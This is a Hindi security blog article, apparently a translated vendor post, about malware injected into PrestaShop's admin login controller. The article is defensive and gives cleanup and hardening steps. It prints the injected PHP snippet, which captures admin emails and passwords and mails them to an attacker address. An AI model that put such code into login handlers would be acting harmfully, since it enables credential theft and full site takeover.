Computer >> कंप्यूटर >  >> नेटवर्किंग >> नेटवर्क सुरक्षा

Prestashop क्रेडेंशियल चोरी मालवेयर [2021]

बढ़ते ई-कॉमर्स प्लेटफॉर्म के रूप में, Prestashop उन हैकर्स के लिए एक बड़ा लक्ष्य है जो जानकारी चुराना चाहते हैं। आमतौर पर, लक्षित की जाने वाली जानकारी क्रेडिट कार्ड नंबर होती है, लेकिन हाल ही में, हमारे शोधकर्ताओं ने एक नए प्रकार के क्रेडेंशियल चोरी करने वाले मैलवेयर की खोज की है जो Prestashop साइटों को लक्षित करता है और साइट व्यवस्थापक क्रेडेंशियल्स को चुराता है। इससे आपकी वेबसाइट का पूर्ण अधिग्रहण हो सकता है।

Prestashop क्रेडेंशियल चोरी करने वाला मैलवेयर कैसे काम करता है

Prestashop क्रेडेंशियल चोरी करने वाला मैलवेयर ./controllers/admin/AdminLoginController.php . फ़ाइल में अंतःक्षिप्त पाया गया Prestashop साइटों पर इस तरह:

public function processLogin()
   {
       /* Check fields validity */
       $passwd = trim(Tools::getValue('passwd'));
       $email = trim(Tools::getValue('email'));
$to = "[email protected]";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <[email protected]>";
$message = "Link : https://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);

इस कोड का उपयोग सर्वर की जानकारी को वेरिएबल में पास करने के लिए किया जाता है। पारित किए गए कुछ चरों में Prestashop बैक-एंड में लॉग इन करने के लिए उपयोग किए जाने वाले उपयोगकर्ता नाम और पासवर्ड शामिल हैं। यह एकत्रित जानकारी कभी-कभी हैकर के ईमेल पते पर PHP mail() function . का उपयोग करके भेजी जाती है ।

भेजे गए ईमेल में वह सब कुछ है जो हमलावर को हैक की गई Prestashop साइट में लॉग इन करने के लिए चाहिए। वहां से, वे साइट तक पहुंच प्राप्त कर सकते हैं। यह उन्हें आपकी वेबसाइट के बैक-एंड इंटरफ़ेस तक पूर्ण पहुँच प्रदान करता है। इसका मतलब है कि वे सामग्री को बदल सकते हैं, नकली/संक्रमित मॉड्यूल या प्लग इन स्थापित कर सकते हैं, और बहुत कुछ कर सकते हैं।

कुछ मामलों में, इस हैक के शिकार लोगों को बाउंस बैक ईमेल मिलने लगे - जो संभवतः Google द्वारा हमले का पता लगाने और इसमें शामिल खातों को अक्षम/रिपोर्ट करने के कारण हो सकता है।

इस मैलवेयर संक्रमण अभियान को चलाने वाले हमलावर/हैकिंग समूह का नाम bajatx / B4JAT4T. माना जाता है।

Prestashop क्रेडेंशियल चोरी मैलवेयर संक्रमण के बाद अपनी साइट को कैसे ठीक करें

1. सफाई करने से पहले अपनी साइट का बैकअप लें।

वेबसाइट को ऑफ़लाइन ले जाने की सलाह दी जाती है ताकि जब आप इसे साफ कर रहे हों तो उपयोगकर्ता संक्रमित पृष्ठों पर न जाएं। सभी कोर फाइलों और डेटाबेस का बैकअप लेना सुनिश्चित करें। .zip जैसे संपीड़ित फ़ाइल स्वरूप में बैकअप लेना एक अच्छा विचार है।

2. कोर, प्लग इन और थीम फ़ाइलों को बदलें।

आप प्रतिष्ठित स्रोतों से संक्रमित कोर फ़ाइलों को उसी के मूल संस्करणों से बदल सकते हैं। इन फ़ाइलों और निर्देशिकाओं के ताज़ा और अद्यतन संस्करण डाउनलोड करने के बाद, आप पुराने को हटा सकते हैं। Prestashop क्रेडेंशियल चोरी करने वाले मैलवेयर को साफ करने में यह विशेष रूप से महत्वपूर्ण है, क्योंकि कोर फाइलों के अंदर दुर्भावनापूर्ण कोड पाया गया है।

3. किसी भी संदिग्ध, हाल ही में संशोधित फ़ाइलों को साफ़ करें।

हाल ही में संशोधित की गई फ़ाइलों को देखकर आपको संभावित रूप से संक्रमित फ़ाइलें मिल सकती हैं। आप इन फ़ाइलों को आपके पास मौजूद क्लीन बैकअप से या किसी विश्वसनीय स्रोत से पुनर्स्थापित कर सकते हैं।

4. मैलवेयर स्कैन चलाएँ।

मैलवेयर और दुर्भावनापूर्ण फ़ाइलों के लिए अपने वेब सर्वर पर मैलवेयर स्कैन चलाएँ। आप अपने वेब होस्ट द्वारा प्रदान किए गए cPanel में 'वायरस स्कैनर' टूल का उपयोग कर सकते हैं, या एस्ट्रा प्रो प्लान के साथ विशेषज्ञ मैलवेयर क्लीनअप प्राप्त कर सकते हैं, जो हमले को रोकता है और बॉट्स भी जो चोरी किए गए डेटा को डाउनलोड करने का प्रयास करते हैं।

इन चरणों के अलावा, आपको Prestashop सुरक्षा पर यह लेख मददगार लग सकता है।

आगे हमलों को कैसे रोकें

आपकी साइट को ठीक करने के बाद, पालन करने के लिए कुछ अच्छे सुरक्षा अभ्यास हैं जो सुनिश्चित करते हैं कि आपकी वेबसाइट Prestashop क्रेडेंशियल चोरी करने वाले मैलवेयर से सुरक्षित रहे:

  • सुनिश्चित करें कि आप अपने सॉफ़्टवेयर का नवीनतम अपडेट चला रहे हैं
  • विश्वसनीय तृतीय-पक्ष भुगतान प्रोसेसर का उपयोग करें
  • नियमित रूप से मैलवेयर स्कैन/सुरक्षा ऑडिट करें
  • फ़ायरवॉल में निवेश करें

अपनी वेबसाइट को हैकर्स के लगातार विकसित होने वाले तरीकों से बचाने का एकमात्र निश्चित तरीका सुरक्षा में निवेश करना है। वेबसाइट फ़ायरवॉल में निवेश करना, बार-बार मैलवेयर स्कैन करना और नियमित सुरक्षा ऑडिट प्राप्त करना एक अच्छा विचार है क्योंकि इससे आपको अपनी वेबसाइट की समग्र सुरक्षा का एक अच्छा विचार मिल सकता है।


  1. PrestaShop "XsamXadoo" मैलवेयर के खिलाफ चेतावनी जारी करता है

    PrestaShop ने XsamXadoo नामक मैलवेयर के आकार में संभावित खतरे के बारे में चेतावनी देने के लिए एक एडवाइजरी जारी की है। अपने स्टोर पर। हैकर्स, कथित तौर पर, इस मैलवेयर का उपयोग आपके PrestaShop स्टोर तक पहुंच प्राप्त करने के लिए कर रहे हैं। कई PrestaShop स्टोर मालिक पहले से ही इस मैलवेयर से जुड़े हुए

  1. मैलवेयर:एक युद्ध जिसे हमने कभी नहीं पूछा

    माइनस्वीपर याद है? वैसे इन दिनों इंटरनेट का उपयोग करना बिल्कुल माइनस्वीपर खेलने जैसा है, जहां कोई भी गलत क्लिक आपदा का कारण बन सकता है। साइबर क्राइम, कंप्यूटर वायरस और गैरकानूनी हैकिंग निश्चित रूप से आज तकनीक की दुनिया में सबसे गर्म विषय बन गए हैं। हालांकि साइबर अपराध और साइबर हैकिंग वास्तव में कोई

  1. क्या कोई स्मार्ट टीवी वायरस या मैलवेयर है?

    यह लेख निम्नलिखित बिंदुओं की जांच करता है: स्मार्ट टीवी वायरस और मैलवेयर के बारे में ज्ञात तथ्य स्मार्ट टीवी वायरस अवधारणा के बारे में विशेषज्ञ और विज्ञान क्या कहते हैं? यदि आप पाते हैं कि आपका स्मार्ट टीवी गलत व्यवहार कर रहा है तो कदम उठाएं। स्मार्ट टीवी वायरस और मैलवेयर के बारे में ज्ञात तथ्य